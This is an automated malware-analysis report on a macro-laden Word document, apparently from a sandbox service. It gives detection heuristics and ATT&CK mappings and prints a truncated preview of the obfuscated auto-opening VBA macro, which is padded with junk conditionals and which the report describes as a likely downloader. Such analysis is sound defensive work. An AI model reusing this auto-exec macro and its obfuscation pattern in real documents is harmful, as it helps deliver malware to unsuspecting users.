Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and triggers the high-severity OLE_VBA_AUTOOPEN heuristic, indicating an auto-executing VBA macro. The macro executes code through GetObject, most likely to download and run a second-stage payload. No specific family could be identified, but the technique is consistent with a macro-based downloader.
Heuristics (7)

- ClamAV: Doc.Malware.Dvwf-6956245-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 63552ef952b653ad980325adb7767d567b0b555ec0f33d991ecea5e213c95f33) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25546 bytes |
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "dBACAAA1"
Sub autoopen()
If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function
Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU
... (truncated)